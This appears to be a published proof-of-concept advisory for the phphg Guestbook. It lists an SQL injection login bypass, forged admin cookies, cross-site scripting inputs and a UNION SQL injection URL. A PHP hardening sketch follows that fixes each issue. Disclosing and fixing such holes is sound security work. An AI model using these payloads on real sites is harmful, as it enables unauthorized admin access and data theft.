PoC/Exploit for Multiple Vulnerabilities in phphg Guestbook

Published Proof of Concept code - Multiple Vulnerabilities in phphg Guestbook.


1. Authentication Bypass

a) SQL Injection
Url: http://host/hg/admin.php
Username: ' or 1/*
Password: any

b) Cookie based authentication
Cookie: loged=yes
Cookie: username=admin
Cookie: user_level=1


2. Cross-Site Scripting Example:
Url: http://host/hg/sign.php
Location: <XSS>
Website: javascript:alert(123)
Message: <XSS>


3. SQL Injection Example:
http://host/hg/admin/edit_smilie.php?id=333'%20union%20select%201,2,3,4/*
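
The three issues above share two root causes: request input concatenated into SQL, and client-supplied values (cookies, form fields) trusted for authorization or echoed unencoded. The following is an added hardening sketch, not phphg's own code: the function names, the `users`/`smilies` tables, their columns, the use of PDO and password hashes, and the meaning of `user_level` 1 as admin are all assumptions.

```php
<?php
declare(strict_types=1);
// Added illustration, not phphg code. Function, table and column names are
// hypothetical; admin level 1 is assumed from the user_level=1 cookie above.

// 1a: bind the username so quote characters in it cannot change the query.
function login(PDO $db, string $username, string $password): bool {
    $stmt = $db->prepare('SELECT username, pass_hash, user_level FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['pass_hash'])) {
        return false;
    }
    // 1b: login state lives in the server-side session (session_start() already called).
    session_regenerate_id(true);
    $_SESSION['username'] = $row['username'];
    $_SESSION['user_level'] = (int) $row['user_level'];
    return true;
}

// 1b: authorize from $_SESSION, never from loged/username/user_level cookies.
function is_admin(): bool {
    return ($_SESSION['user_level'] ?? null) === 1;
}

// 3: accept only a positive decimal integer id, then bind it.
function load_smilie(PDO $db, string $rawId): ?array {
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM smilies WHERE id = ?');
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 2: HTML-encode Location/Message on output; allow only http(s) Website links.
function render_text(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_website(string $url): string {
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    $safe = render_text($url);
    return in_array($scheme, ['http', 'https'], true)
        ? '<a href="' . $safe . '" rel="nofollow noopener">' . $safe . '</a>' : '';
}
```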
